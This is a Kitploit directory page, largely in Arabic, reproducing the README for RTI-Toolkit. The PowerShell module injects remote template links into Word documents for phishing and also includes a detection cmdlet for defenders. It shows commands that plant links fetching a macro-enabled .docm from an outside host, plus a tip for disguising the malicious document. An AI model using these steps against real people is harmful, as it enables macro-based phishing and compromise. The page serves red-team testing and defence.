Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RTI-Toolkit — أداة PowerShell للهجمات والدفاع عبر حقن القوالب عن بُعد. تقوم بحقن روابط ضارة في مستندات Word الخاصة بـ Office لأغراض التصيد، مع وحدات تعريف للفرق الزرقاء. | Kitploit
أدوات/GitHubGitHub/nickvourd/rti-toolkit
أدوات التصيدالتصيد الاحتيالياختبار الاختراقالفريق الأحمر
GitHubnickvourd/rti-toolkit

RTI-Toolkit

أداة PowerShell للهجمات والدفاع عبر حقن القوالب عن بُعد. تقوم بحقن روابط ضارة في مستندات Word الخاصة بـ Office لأغراض التصيد، مع وحدات تعريف للفرق الزرقاء.

عرض المستودع
559منذ 2 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RTI-Toolkit

Remote Template Injection Toolkit

Description

RTI-Toolkit هي مجموعة أدوات PowerShell مفتوحة المصدر لهجوم حقن القالب عن بعد (Remote Template Injection). تتضمن هذه المجموعة سكربت PowerShell باسم PS-Templator.ps1 يمكن استخدامه من منظور هجومي ودفاعي على حد سواء.

يوضح الجدول التالي الوحدات الرئيسية (cmdlets) لـ PS-Templator.ps1:

CmdletDescriptionPrespective
Invoke-Templateينفذ روابط القوالب عن بعد داخل قوالب Word الافتراضيةهجومي
Invoke-Regularينفذ روابط القوالب عن بعد داخل مستندات Word العادية بدون قالبهجومي
Invoke-Identifyيحدد روابط القوالب عن بعد داخل مستندات Word بصيغة docx مع/بدون قالبدفاعي

⚠️ PS-Templator.ps1 يدعم فقط ملفات DOCX.

ℹ️ تمت الإشارة إلى هذه الأداة من قبل المعهد الوطني للمعايير والتقنية (NIST) في قاعدة بيانات الثغرات الوطنية (NVD) من خلال CVE-2025-65318 و CVE-2025-65319.

Version

1.0.0

License

هذه الأداة مرخصة بموجب License: MIT.

Acknowledgement

شكر خاص لأصدقائي @Papadope9 و Stavros Gkounis (a.k.a purpl3ph03n1x)، الذين قدموا مساعدة لا تقدر بثمن خلال مرحلة الاختبار التجريبي للأداة.

تم استلهام هذه الأداة خلال تقييم اختبار اختراق أحمر (Red Teaming Assessment) مع @S1ckB0y1337 قبل عدة سنوات.

تم إنشاء Supernova بـ ❤️ بواسطة @nickvourd.

Table of Contents

  • RTI-Toolkit
    • Description
    • Version
    • License
    • Acknowledgement
    • Table of Contents
    • Remote Template Injection (RTI)
    • Installation
    • Cmdlets
      • Invoke-Template
        • Invoke-Template Example
      • Invoke-Regular
        • Invoke-Regular Example
        • Invoke-Regular Example 2
      • Invoke-Identify
        • Invoke-Identify Example
        • Invoke-Identify Example 2
    • References

Remote Template Injection (RTI)

حقن القالب عن بعد (RTI) في سياق Microsoft Office يشير إلى نوع محدد من الثغرات الأمنية التي يمكن استغلالها من خلال قوالب ضارة في مستندات Office (مثل Word, Excel, PowerPoint).

على سبيل المثال، في ملف DOCX، يتم تخزين المحتوى بتنسيق XML داخل الأرشيف، وقد تشير بعض ملفات XML هذه إلى موارد خارجية أو قوالب. يمكن للمهاجمين بالفعل التلاعب بملفات XML هذه لإدراج روابط ضارة أو محتوى يمكن أن يستغل الثغرات أو يخدع المستخدمين.

هذا هجوم يعتمد على الماكرو (Macro-Based attack).

Installation

لتحميل PS-Templator.ps1 كوحدة في الذاكرة، قم بتشغيل الأمر التالي:

root@kitploit:~
Import-Module .\PS-Templator.ps1

ℹ️ يعمل PS-Templator.ps1 دون الحاجة إلى تثبيت أي تبعيات إضافية.

ℹ️ يعمل PS-Templator.ps1 كوحدة PowerShell.

ℹ️ تم اختبار PS-Templator.ps1 على جهاز Windows 10 مع Office 2019 Professional Plus.

Cmdlets

Invoke-Template

Invoke-Template هو cmdlet ينفذ روابط القوالب عن بعد داخل قوالب Word الافتراضية.

Invoke-Template Example

بافتراض أن لديك قالب Word افتراضي، مثل أحدهم:

All Words Templates

محفوظ باسم، على سبيل المثال، 'Name.docx':

Default Word Template Document

إذا استخدمت cmdlet Invoke-Template يمكنك إدراج رابط ضار داخل هذا الملف docx:

⚠️ قبل تشغيل Invoke-Template، تأكد من حفظ المستند وإغلاقه (إنهاء عمليته).

root@kitploit:~
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

النتيجة:

Invoke-Template-1

كما ترى، تحتفظ وحدة Invoke-Template بنسخة احتياطية من المستند الأصلي وتوفر المسار الكامل للمستند الضار.

من منظور تصحيح الأخطاء، إذا قمت بتحويل الملف الضار docx إلى أرشيف zip وذهبت إلى /word/_rels/settings.xml.rels، يمكنك رؤية الرابط الضار:

Invoke-Template-Debug

Invoke-Regular

Invoke-Regular هو cmdlet ينفذ روابط القوالب عن بعد داخل مستندات Word العادية بدون قوالب.

Invoke-Regular Example

بافتراض أن لديك مستند Word عادي بدون قالب، مثل هذا:

Blank Document

محفوظ باسم، على سبيل المثال، 'Doc1.docx':

Word Document

إذا استخدمت cmdlet Invoke-Regular يمكنك إدراج رابط ضار داخل هذا الملف docx:

⚠️ قبل تشغيل Invoke-Regular، تأكد من حفظ المستند وإغلاقه (إنهاء عمليته).

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

النتيجة:

Invoke-Regular-1

كما ترى، تحتفظ وحدة Invoke-Regular بنسخة احتياطية من المستند الأصلي وتوفر المسار الكامل للمستند الضار.

من منظور تصحيح الأخطاء، إذا قمت بتحويل الملف الضار docx إلى أرشيف zip وذهبت إلى /word/_rels/settings.xml.rels، يمكنك رؤية الرابط الضار:

Invoke-Regular-Debug-1

Invoke-Regular Example 2

من منظور OPSEC، يمكنك استخدام -TemplateName بالتزامن مع وحدة Invoke-Regular. هذا سيجعل المستند الضار يبدو أكثر شرعية إذا حاول شخص ما تحليله.

إليك مثال:

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

النتيجة:

Invoke-Regular-Example-2

من منظور تصحيح الأخطاء، إذا قمت بتحويل الملف الضار docx إلى أرشيف zip وذهبت إلى /docProps/app.xml، يمكنك رؤية اسم القالب المزيف:

Invoke-Regular-Fake-Template-Name

Invoke-Identify

Invoke-Identify هو cmdlet يحدد روابط القوالب عن بعد داخل مستندات Word بصيغة docx مع/بدون قالب.

Invoke-Identify Example

بافتراض أن لديك مستند Word ضار:

root@kitploit:~
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

النتيجة:

Invoke-Identify Malicous Example

Invoke-Identify Example 2

بافتراض أن لديك مستند Word غير ضار:

root@kitploit:~
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

النتيجة:

Invoke-Identify Clean Example

References

  • ired.team
  • dmcxblue.gitbook.io
  • john-woodman.com
  • remoteInjector GitHub by John Woodman
  • Invoke-Templator GitHub by Outflanknl
  • attack.mitre.org
  • BadAssMacros GitHub by Inf0secRabbit
تنزيل الأداة